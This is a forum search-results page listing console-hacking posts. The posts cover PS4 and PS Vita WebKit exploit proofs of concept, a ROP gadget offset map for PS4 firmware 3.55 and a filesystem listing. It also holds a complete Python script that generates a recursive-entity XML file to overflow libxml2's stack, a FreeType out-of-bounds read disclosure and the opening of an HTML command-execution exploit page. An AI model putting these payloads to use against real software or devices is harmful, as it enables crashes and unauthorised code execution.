Search found 8 matches

by dragood2
Fri Oct 14, 2016 3:08 pm
Forum: Programming and Security
Topic: PS4 4.01 Webkit Exploits ( POC , no ROP yet)
Replies: 2
Views: 15243

PS4 4.01 Webkit Exploits ( POC , no ROP yet)

This repository contains all the WebKit vulnerabilities that affect the PS4 on version 4.01 (not tested on lower versions, but could be ported with enough development). Keep in mind that it's not a ROP, so it won't give you access to SysModules, Dumping, FSBrowsing and all that. It's just a Proof O...
by dragood2
Wed Sep 28, 2016 5:09 pm
Forum: Programming and Security
Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
Replies: 3
Views: 12166

PS4 3.55 Updated and more extensive Gadget List.

gadgetMap = { 'PlayStation 4 3.55': { 'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f), 'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c), 'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40), 'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99), 'sysca...
by dragood2
Wed Sep 28, 2016 5:07 pm
Forum: Programming and Security
Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
Replies: 3
Views: 12166

PS4 3.55 Full Browser FileSystem and extensive Gadget list

d /. d /.. d /dev c /dev/dipsw c /dev/dmem0 c /dev/dmem1 c /dev/dmem2 c /dev/ctty c /dev/deci_stdout c /dev/deci_stderr c /dev/deci_tty2 c /dev/deci_tty3 c /dev/deci_tty4 c /dev/deci_tty5 c /dev/deci_tty6 c /dev/deci_tty7 c /dev/deci_ttya0 c /dev/deci_ttyb0 c /dev/deci_ttyc0 c /dev/deci_stdin c /de...
by dragood2
Wed May 04, 2016 6:06 am
Forum: Programming and Security
Topic: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
Replies: 9
Views: 12028

Re: Libxml2 exploit poc, possible ps4 port?

Script:
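#!/bin/python3

# Writes repo.xml: a DOCTYPE whose entities each reference the next one.
f = open('repo.xml', 'w')

f.write("<!DOCTYPE a [ ")

i = 1

# Entity a<i> expands to a reference to a<i+1>.
while (i < 30000):
    f.write("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
    i = i+1

# Final entity points back to a1; the attribute value references a1.
f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")

f.close()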
by dragood2
Wed May 04, 2016 6:05 am
Forum: Programming and Security
Topic: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
Replies: 9
Views: 12028

Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Hi This is a disclosure of the following issue that was raised a week ago on the distro's mailing list. Both bugs on the gnome bugtracker are currently private and should be made public now. A couple of weeks back while working on a related bug [CVE-2016-3627] I discovered a specially created xml fi...
by dragood2
Mon Jan 11, 2016 10:53 pm
Forum: Programming and Security
Topic: Possible PS4 3.11 Out of Bound Read (Freetype 64bit exploit)
Replies: 2
Views: 11549

Possible PS4 3.11 Out of Bound Read (Freetype 64bit exploit)

Source: https://code.google.com/p/google-security-research/issues/detail?id=614 The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compile...
by dragood2
Mon Jan 11, 2016 10:49 pm
Forum: Programming and Security
Topic: PS Vita Command Execution through Trend Micro (exploit)
Replies: 3
Views: 4325

PS Vita Command Execution through Trend Micro (exploit)

<html> <head> <title>Trend Micro Exploit</title> </head> <body> <p> Sample exploit for Trend Micro . <p> <p> Command: <input id="command" value="insert command here" size="64"> <p> <a href="javascript:begin()">Click Here</a> to run the command above <p> <img src="http://reactiongifs.us/wp-content/up...